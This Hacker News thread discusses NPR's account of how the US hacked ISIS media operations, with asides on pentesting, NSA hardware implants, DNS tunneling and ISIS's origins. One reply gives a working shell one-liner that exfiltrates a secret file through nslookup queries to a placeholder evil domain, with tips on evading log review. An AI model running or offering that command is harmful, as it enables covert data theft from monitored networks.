
How the US Hacked ISIS - a0zU
http://npr.org/2019/09/26/763545811/how-the-u-s-hacked-isis
======
segfaultbuserr
I fully understand that the operation is classified and details cannot be
revealed, but I have to say: the description of the technical details is still
a bad Hollywood movie [0]...

> After that, the momentum started to build. One team would take screenshots
> to gather intelligence for later; another would lock ISIS videographers out
> of their own accounts.

> "Reset Successful" one screen would say.

> "Folder directory deleted," said another.

 _Folder directory_??? Did they also delete the "file document"?

> The screens they were seeing on the Ops floor on the NSA campus were the
> same ones someone in Syria might have been looking at in real time, until
> someone in Syria hit refresh. Once he did that, he would see: 404 error:
> Destination unreadable.

 _404 error: Destination unreadable_??? At least, use "unreachable"...

> _" Target 5 is done," someone would yell._

> _Someone else would walk across the room and cross the number off the big
> target sheet on the wall. "We're crossing names off the list. We're crossing
> accounts off the list. We're crossing IPs off the list," said Neil. And
> every time a number went down they would yell one word: "Jackpot!"_

[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is
used not only to describe hacking, but actually to put it into practice.
Characters will come up with rubbish like, "Extinguish the firewall!" and
"I'll use the Millennium Bug to launch an Overclocking Attack on the whole
Internet!"
[https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking](https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking)

~~~
sillysaurusx
Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-
famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to
get as far as possible. Apparently they were running <outdated version> of
<software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can
get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality
is that it's very methodical, very "boring" work. It's basically a giant
matrix of probabilities: there are hundreds of thousands of attack vectors,
and your job is to tap as many as possible, sorted by probability of
effectiveness, until something sticks. Then use your head to get further,
adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day
would be spent writing reports, I probably wouldn't have joined. But the 30%
of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be,
and that _you were paid to do it_ , is amazing. The rules change from
engagement to engagement, but usually it's "do whatever you want, but don't
modify any data, i.e. no destructive actions, and all info you've collected
will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff
offensively.

Also, it might seem absurd that I'm comparing this story to the most elite
hackers in the developed world. And maybe it is. But if you knew which
<company> it was, and exactly what <highly surprising claim> was, you'd be
shocked that one or two smart developers poking at internals were able to
compromise the entire corporate network of <famous company>, to the point of
being able to... well. Let's just say, I wish I could say. It's a weird
feeling, seeing it with my own eyes, knowing it's true, and never being able
to talk fully about it. :)

So I imagine the NSA spooks are doing similarlly-methodical work, with some
cheat codes like "we intercepted their computer before delivery and installed
a backdoor that only activates when we send a specially malformed packet that
would normally be dropped and is therefore invisible, which grants us access
as needed."

~~~
082349872349872
If the cheat codes were along the lines of "as long as they're using anyone's
routers but Huawei's" they would not even require interception and
customisation.

~~~
sillysaurusx
I wish I understood it better, because it's a real technique that the NSA
uses, as far as I know. And I agree that it seems like it shouldn't be that
simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a
network without raising alarms. One way to do it is to set up a DNS server.
Basically, you use DNS itself as a communication method, not merely a lookup
table.

I've never actually used it, but it always seemed a cool idea. Almost no one
blocks DNS, which means you can send data from anywhere in the world in a very
unexpected way. You'd of course want to keep the transmission size reasonable
(perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you
can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your
special server>` on. So this technique works in almost every case, except
extremely monitored systems that only allow outgoing connections to a specific
set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored
NICs, I forget why it works, since the packet would need to pass through many
routers along the way. In fact, I feel like I'm misremembering. Most target
computers are behind routers, so it really doesn't make sense. Maybe it's a
technique used against routers themselves. All I remember is that the NSA has
some type of "signals we can send which normal networking tooling doesn't
detect at all," along with a dose of "we know Iran just ordered some new
servers, so we intercepted the servers and installed a backdoor." (The latter
is called TAO:
[https://en.wikipedia.org/wiki/Tailored_Access_Operations](https://en.wikipedia.org/wiki/Tailored_Access_Operations))

They definitely do something with NICs though. The ANT document
([https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...](https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_list))
shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing
approximately $1.25M for 50 units." Must be one hell of a plug.

[https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS...](https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NSA_COTTONMOUTH-I.jpg)
is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs
it in to the target device. I wonder what the range on stuff like that is...
Seems like you'd have to be sitting outside in a van or something, which is
rather hard to do if your target is a nuclear enrichment facility (stuxnet).

~~~
goatinaboat
_you 'd be able to `nslookup foo.com <your special server>` on_

You don’t need to tell nslookup to use a special server. If you control the
SOA for your own domain, the normal DNS server will happily exfiltrate your
data for you.

~~~
DaiPlusPlus
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled
data in DNS TXT records generated by a DNS server I ran on my colocated rack
to allow me to surf the wider web when my laptop was connected to Wi-Fi
captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as
well as portals that had their own exclusive DNS - provided that those portals
worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely
enough for basic email functionality and text-only web-surfing.

~~~
goatinaboat
_Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled
data in DNS TXT records generated by a DNS server_

It's even easier that if you just want to sneak a relatively small file out.

    
    
        for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
    

Then get the file out of your evil DNS server logs at the other end. Of course
this depends on how much DNS logging the local site is doing and if anyone is
paying attention to those logs, but a few random sleeps should help there.

------
bashinator
Here's another account in the form of an extended interview with one of the
commanders of US Cyber Command at the time.

[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

~~~
jonnyreiss
Highly recommend this podcast---Ep 29: Stuxnet is another episode worth
checking out

------
082349872349872
> "The United States is the country most highly dependent on these
> technologies," Deibert said. "And arguably the most vulnerable to these
> sorts of attacks. I think there should be far more attention devoted to
> thinking about proper systems of security, to defense."

It's all fun and games until someone melts down a reactor.

The journalist is probably playing with Cunningham's Law, but I distinctly
recall the doomsday gap scene (
[https://news.ycombinator.com/item?id=24481298](https://news.ycombinator.com/item?id=24481298)
) as having been closer to the middle of _Dr. Strangelove_. The end came after
the referent of
[https://www.youtube.com/watch?v=K10pdj5YOy0](https://www.youtube.com/watch?v=K10pdj5YOy0)
.

Bonus clip (note the lack of any source attribution problem in these cases):
[https://www.youtube.com/watch?v=nZ8oA9-OQrg](https://www.youtube.com/watch?v=nZ8oA9-OQrg)

------
joe_the_user
It's kind of odd to think what ISIS' media operations brought it. Initially
they seem to have garner a variety of international recruits, I most from a
Muslim background but some not. But either way, a lot of their appeal was an
absolute nihilistic rejection of "modernity". It seems like the appeal involve
a kind of fundamental alienation combined with being a flavor of the month -
sort of the appeal of leftism but lacking any sense that things can be
improved.

I suspect shutting down their media probably stopped having an effect through
novelty wearing off, all the best recruits being recruited and the world
moving on to (inadvertently or not) selling some other reactionary rebellion -
and the group being militarily defeated in Syria.

~~~
082349872349872
One of the lightly ironic points Linebarger (in his textbook, _Psychological
Warfare_ ) makes is: never trust a psywar person as a reliable narrator, to
accurately and straightforwardly report how effective they may have been.
Their _déformation professionelle_ is, after all, self-serving sophistry.

(I trust Linebarger more than Bernays because the former also catalogues not
only his failures, but _sotto voce_ , even touches upon those of his mid-
twentieth century society.)

Bonus clip:
[https://www.youtube.com/watch?v=mLNAkPsjAEk](https://www.youtube.com/watch?v=mLNAkPsjAEk)
(what's the hip hop equivalent?)

------
septillianator
>Six years ago, it rather famously discovered that China had been hacking into
the Dalai Lama's computer networks

why does china care so much about the dalai lama?

~~~
AnimalMuppet
Because people in Tibet recognize him as a non-Beijing authority.

------
Stierlitz
Really Hackernews, do you have to repost this neocon BS on a respectable
technology forum.

[https://theintercept.com/2018/01/29/isis-iraq-war-islamic-
st...](https://theintercept.com/2018/01/29/isis-iraq-war-islamic-state-
blowback/)

------
_kbh_
Heres an account from the view of one of the allies involved in the same
operation.

[https://www.abc.net.au/news/2019-12-18/inside-the-islamic-
st...](https://www.abc.net.au/news/2019-12-18/inside-the-islamic-state-hack-
that-crippled-the-terror-group/11792958?nw=0)

~~~
082349872349872
Up until today, I had thought of the (obviously shopped)
[https://demotivation.me/images/20140405/rhq85mwjl9qh.jpg](https://demotivation.me/images/20140405/rhq85mwjl9qh.jpg)
as inaccurate because while it seems plausible for spooks to do such things,
they don't wear fatigues. (compare ops room hero photo above: is the fatigue-
wearer a seppo liaison?)

~~~
acqq
The original picture, showing the U.S. soldiers in front of the computers in
the 2010 Wired article about the NSA and the Department of Homeland Security:

"Doc of the Day: NSA, DHS Trade Players for Net Defense"

[https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-
trade-p...](https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-trade-
players-for-net-defense/)

The fatigues are common in the pictures:

[https://www.cyberscoop.com/us-cyber-command-nsa-
government-h...](https://www.cyberscoop.com/us-cyber-command-nsa-government-
hacking-operations-fight/)

~~~
082349872349872
Thanks for the op. I had been guessing (from the steering wheel) that it was a
joint force LAN party, but now that I'm no longer distracted by cyrillic, I'm
wondering about the yellow left-hand keycaps?

> "But there are U.S. intelligence officials who still worry about what Cyber
> Command’s rise will mean for espionage missions."

suggests another domestic explanation for revealing Glowing Symphony would be
turf wars with non-concurring bureaucracies.

(Apparently successfully, judging by 2020 changes to us code buried somewhere
in the appropriations bill S.1790 § 1632.

Poorer US HN'ers may be interested to know there's also language in that bill
about cyber pay rates, which I left unread but would guess implies they're
attempting to be competitive with private sector compensation.)

------
boomboomsubban
So how long until it comes out that this was all a lie, and really they just
flipped one of the server admins?

------
Lotuseater
Darknet diaries covered this story in a podcast ages ago. NPR is just
recycling the content. Full episode here for those interested:
[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

------
alexpotato
For the audio version of this story from a different source, I highly
recommend the Darknet Diaries podcast episode:
[https://darknetdiaries.com/episode/50/](https://darknetdiaries.com/episode/50/)

------
Yc4win
Not sure if the article mentions it (haven't read it yet) but JTF-ARES was the
force tasked with sabotage and often it was against targets such as the
militants video (propaganda) productions.

Edit: Really not sure why I got downvoted, as I provided accurate info?

~~~
_-___________-_
Can't speak for anyone else but I didn't understand the purpose of your
comment; it merely restates one fact from the article, which you didn't bother
to read before commenting.

~~~
Yc4win
It was just something I remembered that I found interesting when I first
learned about it prior to this article.

------
Aperocky
> I mean, I’m just guessing here but here’s an attack I think they probably
> did; first, imagine if they hacked into the phone of one of these ISIS media
> people and then on that phone, they stole the private decryption keys for
> that phone. This would be the key used to decrypt messages to that phone.
> Then, imagine they hacked into the WiFi network that phone was on and
> somehow captured all the traffic to that phone. Somewhere in that traffic
> are the private chat messages to that phone and with these private keys, I’m
> guessing it’s technically possible to decrypt those messages. This would be
> a pretty complex hack but I bet it’s something that US Cyber Command could
> do.

Yeah.. probably not how it happened.

------
kursus
> He asked us to use only his first name to protect his identity

There was 80 persons inside one of the most powerful room of the world so they
just use his first name to protect his identity.

------
canada_dry
TL;DR: "Fire" (from the first sentence) wasn't shooting something but the
beginning of a cyber exercise. Started with a successful phishing email and
got lucky because an ISIS operative was re-using the same password in several
places.

That article was painfully too long.

------
encom
For EU people: [https://archive.ph/XZ2Dg](https://archive.ph/XZ2Dg)

------
jtchang
In a way doesn't this just cause the adversary to adopt better operational
practices? Persistent access and monitoring would probably be better long
term.

~~~
mhh__
You have to make that tradeoff.

Think about Enigma and Lorenz, or any cold war double agent - you've got this
fountain of knowledge but if you start burning assets left right and centre
they'll realize something's wrong (Or in the case of MI6 they'll get
embarrassed and allow the double agent to slip away as long as they shut up)

~~~
082349872349872
Having been thinking that cyberwar could be a wonderful thing if it keeps
everyone occupied and well away from civilian lives, as long as I was in cloud
cuckoo land I figured we (the non-inclusive we, meaning: anyone but me) ought
to set up a giant (bits, not atoms, remember?) online honeypot that gets
spooks in so deep that they become N-tuple agents (where N is chosen
sufficiently large to overflow their mental stacks, allowing us to set them to
chasing each other in _cyclical_ patterns) and eventually wind up typing in
gibberish in grand operations that, like the coruscating beams of an E.E.
"Doc" Smith novel, escalate to grappling with networks of cosmic proportions,
but in truth are on the wrong side of an impedance mismatch to affect the real
world.

Inspired by a low-tech single-ply version:
[https://en.wikipedia.org/wiki/Operation_Scherhorn](https://en.wikipedia.org/wiki/Operation_Scherhorn)

and Linebarger's suggestion for how to drive enemy intelligence mad:
[http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Pag...](http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Page_132)

> "If you feel like showing off, average everything into everything else and
> call it the Gross Index of Total Enemy Morale. This won't fool anyone who
> knows the propaganda business, and you won't be able to do anything with or
> about it, but you can hang it on a month-by-month chart in the front office,
> where visitors can be impressed at getting in on a military secret.
> (Incidentally, if some smart enemy agent sees it and reports it back, enemy
> intelligence experts will go mad trying to figure out just how you got that
> figure. It's like the old joke that the average American is ten-elevenths
> White, 52% female, and always slightly pregnant.)"

TIL CthulhuPunk is a thing.

Anyone familiar enough with the Cthulhu-mythos to tell me if there are any
impediments in canon to the following retcon: what if Great Old Ones are
Scissor Entities, and appear to xenophobes as horrific monsters of vaguely
anthropoid outline, with octopus-like heads and prodigious claws, but to
xenophiles as animated pegasus unicorns, and, as part of their eternal
struggle against the Blue Meanies, drive the former to gibbering madness but
invite the latter over for tea?

[https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b...](https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b738d7b4a7569.jpg)

------
mrpickels
US hacked ISIS because US made ISIS

------
nimbius
Friendly reminder: the US basically created ISIS through it's hamfisted
invasion of Iraq. Cheerleading tbis sort of effort is like congratulating a
child when they decide to eat their peas.

~~~
arlk
Yes and no. US did also invade Afghanistan, but that didn't create a
phenomenon like ISIS.

ISIS was actually there, founded by Zarqawi like any other group, but its main
differentiator was its swift rise to power and popularity after 2011
benefiting from the unbearable oppression of Sunnis in Iraq by Iran and its
proxy, which made them align with whoever could be their savior and get rid of
the Iranian influence. You can see this clearly when ISIS stormed the prisons
where thousands of Sunnis were sentenced to death, and made them into the
second wave of recruits.

US did enable ISIS, Zarqawi and co created it, Iran gave people a reason to
join it in mass, and international agenda, most importantly the US object to
get its enemies (Iran and ISIS) bleed each other, and the Kurdish leftists to
ask for its help to the degree to become its proxies, left a space for it to
be the monster it was.

Can't also ignore the Turkish and Kurdistani indifference (before ISIS started
attacking them, there were ISIS/Kurdistani checkpoints side by side drinking
tea together), and the Syrian allowance of fighters flood to Iraq through its
the eastern borders since the invasion.

Blaming only the US (although it's the initial culprit) doesn't address the
complexity of this problem.

~~~
Iv
The invasion was not enough to create ISIS. To do that, US had to name an
idiot as Iraq's governor. Enters Paul Bremer. A single decision of his made
ISIS possible.

He got to manage a country that just got invaded, that used to have a huge
military and where the occupiers are still fighting the remnants of rebel
forces in some part of the country.

In that context, he decided that the former officers from Saddam Hussein's
regime would be barred from the new Iraq military and that they should not
receive pension either.

He, put yourself in their shoes: when your job is to organize a military, that
the only lawful employer refused your services and denies your pension, are
you going to go homeless and beg in the streets or are you going to join a
rebellious startup?

The ISIS of the origin was organized just like the Baath army was, because
that's the framework the officers knew. There were some documents captured
(that involved less "hacking" than physical invasion of command structures but
of course we never know the amount of covert ops going on) and what they
revealed was that one budget line was the biggest of the whole organization:
pensions. Suicide bombing is not the career path everybody chose there.

ISIS is not a US creation: that would imply GWB's administration capacity to
plan such a thing. But it came from crucial mistakes the US did despite being
warned about these years prior.

------
Robotbeat
"ISIS" is an acronym and should be capitalized. (Isis is an Egyptian goddess
of no relation to ISIS.)

~~~
mikeyouse
Isis is also an unfortunately common name. Most of my coworker's apps stopped
working and her banking became _much_ more difficult sometime around 2012.

~~~
FooBarBizBazz
This seems dumb on the part of the bank. Unless terrorists are really, really
stupid, classifying the first name "Isis" as "terrorist" is bound to have a
100% false positive rate.

~~~
mikeyouse
You're not wrong - but try to Venmo somebody funds for a "Cuban Sandwich" or
an "Iranian restaurant" and see what happens though.

~~~
creddit
I just did the Cuban Sandwich one without a problem. What should I be
expecting?

~~~
srtjstjsj
USA had (has?) sanctions banning trading with Cuba.

~~~
creddit
I know. I'm just not sure why the OP is so confident that me putting "Cuban
Sandwich" in the memo is going to get me flagged. Still good so far.

------
1vuio0pswjnm7
What is the point of using an [http://](http://) URL with a website like NPR.
These popular sites all redirect to [https://](https://)

Headers will be sent over the wire in the clear before any redirection can
occur.

A localhost-bound proxy can fix this before the request leaves network
interface.

I guess the "modern" browser fixes this for everyone else not using a
("modern") proxy.

~~~
Drip33
> I guess the "modern" browser fixes this for everyone else not using a
> ("modern") proxy.

Only if the site owner wants it so
[https://hstspreload.org/](https://hstspreload.org/)

